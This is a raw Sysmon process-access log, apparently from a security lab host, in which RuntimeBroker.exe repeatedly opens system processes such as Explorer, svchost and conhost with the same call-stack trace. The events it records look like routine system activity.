13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8700-000000009A01}4792C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42BD-6000-8600-000000009A01}4780C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8500-000000009A01}4280C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-42B0-6000-8400-000000009A01}4268C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4760-6000-2505-000000009A01}4720C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4755-6000-1B05-000000009A01}3580C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-1505-000000009A01}3792C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.826{08A6967A-4753-6000-0D05-000000009A01}11165548C:\Windows\System32\RuntimeBroker.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2d869|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+b8ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 